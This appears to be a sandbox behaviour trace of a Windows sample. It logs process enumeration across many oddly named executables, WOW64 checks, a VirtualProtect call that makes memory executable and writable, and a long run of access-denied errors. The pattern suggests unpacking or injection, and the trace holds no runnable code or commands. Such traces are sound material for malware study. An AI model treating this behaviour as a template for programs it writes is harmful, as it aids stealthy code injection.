	[0069.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x1f0
	[0069.932] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.932] CloseHandle (hObject=0x1f0) returned 1
	[0069.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728758, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0069.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x1f0
	[0069.932] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.932] CloseHandle (hObject=0x1f0) returned 1
	[0069.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728778, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0069.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x1f0
	[0069.932] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.932] CloseHandle (hObject=0x1f0) returned 1
	[0069.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x728028, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0069.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x1f0
	[0069.933] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.933] CloseHandle (hObject=0x1f0) returned 1
	[0069.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x728190, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0069.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x1f0
	[0069.933] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.933] CloseHandle (hObject=0x1f0) returned 1
	[0069.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x71bf38, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0069.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x1f0
	[0069.933] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.933] CloseHandle (hObject=0x1f0) returned 1
	[0069.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x728070, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0069.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x1f0
	[0069.934] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.934] CloseHandle (hObject=0x1f0) returned 1
	[0069.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x728250, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0069.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x1f0
	[0069.934] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.934] CloseHandle (hObject=0x1f0) returned 1
	[0069.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728a98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0069.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x1f0
	[0069.934] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.934] CloseHandle (hObject=0x1f0) returned 1
	[0069.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x728070, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0069.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x1f0
	[0069.934] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.934] CloseHandle (hObject=0x1f0) returned 1
	[0069.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7286f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0069.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x1f0
	[0069.935] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.935] CloseHandle (hObject=0x1f0) returned 1
	[0069.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x71bf38, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0069.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x1f0
	[0069.935] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.935] CloseHandle (hObject=0x1f0) returned 1
	[0069.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x71bf38, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0069.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x1f0
	[0069.935] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.935] CloseHandle (hObject=0x1f0) returned 1
	[0069.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x728190, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0069.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0069.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x728190, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0069.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae8) returned 0x1f0
	[0069.936] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.936] CloseHandle (hObject=0x1f0) returned 1
	[0069.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x728280, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x1f0
	[0069.936] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.936] CloseHandle (hObject=0x1f0) returned 1
	[0069.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x71bd58, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0069.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x1f0
	[0069.937] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.937] CloseHandle (hObject=0x1f0) returned 1
	[0069.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x728190, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0069.937] VirtualFree (lpAddress=0x690000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0069.938] VirtualProtect (in: lpAddress=0x432e20, dwSize=0x184, flNewProtect=0x40, lpflOldProtect=0x25afdc8 | out: lpflOldProtect=0x25afdc8*=0x4) returned 1
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.938] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.939] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.940] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.941] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.942] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.943] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.944] GetLastError () returned 0x5
	[0069.945] GetLastError () returned 0x5
	[0069.945] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.972] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
